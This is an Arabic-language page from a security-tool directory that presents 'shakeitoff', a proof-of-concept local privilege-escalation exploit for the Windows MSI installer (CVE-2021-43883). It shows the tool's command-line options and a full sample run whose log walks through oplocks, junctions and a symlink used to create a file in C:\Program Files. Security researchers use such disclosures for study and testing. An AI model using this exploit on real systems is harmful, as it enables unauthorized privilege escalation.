Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
shakeitoff — ثغرة رفع الامتيازات المحلية في مثبت MSI لنظام ويندوز (CVE-2021-43883) | Kitploit
أدوات/GitHubGitHub/jbaines-r7/shakeitoff
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراق
GitHubjbaines-r7/shakeitoff

shakeitoff

ثغرة رفع الامتيازات المحلية في مثبت MSI لنظام ويندوز (CVE-2021-43883)

عرض المستودع
7916منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

shakeitoff

نسخة أصغر وأقل حجماً وأنظف من InstallerFileTakeOver المعروف أيضًا باسم الثغرة ذات اليوم الصفر والتي هي "اختلاف" عن CVE-2021-41379 (والتي تم تخصيصها لاحقًا CVE-2021-43883). هذه النسخة لا تفتح شيل مثل InstallerFileTakeOver. الهدف من هذا الكود هو إنشاء برهان مفهوم أبسط وأكثر موثوقية لإظهار هجوم إنشاء الملفات. سيقوم هذا البرهان بإنشاء الملف التعسفي الذي يطلبه المستخدم (ونسخ نفسه فيه لإثبات قابلية الكتابة). إظهار تنفيذ الكود هو تمرين تافه يُترك للقارئ.

لفهم كيفية عمل الهجوم، يُرجى الاطلاع على شرح AttackerKB.

الاستخدام

تتطلب الأداة ثلاث معاملات:

root@kitploit:~
C:\Users\albinolobster\source\repos\shakeitoff\x64\Release>.\shakeitoff.exe
option "msi_path" is required
Allowed options:
  -h, --help              produce help message
  -m, --msi_path arg      The path to the MSI to install
  -i, --install_path arg  The path to install to
  -p, --target_path arg   The file to create
  1. -m - ملف msi المراد تثبيته (المسار الكامل مطلوب). يتم توفير واحد في هذا المستودع (ويجب استخدامه لأن مسارات الملفات مهمة فعلاً).
  2. -i - مسار التثبيت (المسار الكامل مطلوب). هذا هو المكان الذي سيتم فيه تثبيت msi / حيث يحدث الاستغلال. يجب على المستخدم تحديده مسبقًا ويجب أن يكون دليلاً فارغًا. لا تقوم الأداة بتنظيفه لأن ذلك يسهل فهم الثغرة. يجب أيضًا أن يكون هناك شرطة مائلة للخلف في النهاية لأنني وحش.
  3. -p - الملف المراد الكتابة فوقه/إنشاؤه. المسار الكامل مطلوب.

سيقوم البرهان بنسخ نفسه إلى الملف المستهدف.

مثال الاستخدام

root@kitploit:~
C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

File Not Found

C:\Users\Public>.\shakeitoff.exe -m C:\Users\Public\shakeitoff.msi -i C:\Users\Public\lol\ -p "C:\Program Files\lol"
[+] User provided MSI path: C:\Users\Public\shakeitoff.msi
[+] The target path is: C:\Program Files\lol
[+] Create the temp directory structure we'll install into
[+] Grabbing handle to lock C:\Users\Public\lol\shakeitoff\haters.jpg
[+] Grabbing a directory handle of C:\Users\Public\lol\shakeitoff\
[+] Monitor shakeitoff\shakeitoff for an rbf file
[+] MSI install: ACTION=ADMIN REBOOT=ReallySuppress TARGETDIR=C:\Users\Public\lol\ C:\Users\Public\shakeitoff.msi
[+] Grabbing a handle to inner shakeitoff directory
[+] In callback for oplock one
[+] Opening handle to C:\Users\Public\lol\shakeitoff\8da858.rbf
[+] Creating the callback directory at C:\Users\Public\lol\cb_directory
[+] Grab a handle for the callback directry
[+] Creating a junction from C:\Users\Public\lol\cb_directory to \BaseNamedObjects\Restricted
[+] Inside callback two
[+] Release the hater.jpg handle to unlock
[+] Move the rbf file to C:\Users\Public\lol\weird_directory
[+] Move inner shakeitoff to C:\Users\Public\lol\weird_directory
[+] Move junction at C:\Users\Public\lol\cb_directory to C:\Users\Public\lol\shakeitoff
[+] Configuring symlink from \BaseNamedObjects\Restricted\8da858.rbf to \??\C:\Program Files\lol
[+] symlink created!
[+] MsiInstallProductA return value: 1603
[+] Exploit thread joined
[+] Copy into target!

C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

12/02/2021  02:01 PM           368,640 lol
               1 File(s)        368,640 bytes
               0 Dir(s)  86,015,610,880 bytes free

الإسناد

  • هذا الكود متأثر بـ الاستغلال الأصلي الذي نشره عبد الحميد ناصري (وهو أيضًا مكتشف الثغرة الأصلي!).
  • كود FileOpLock هو نسخة (معدلة قليلاً) مأخوذة من angrypolarbearbug2
  • تايلور سويفت
تنزيل الأداة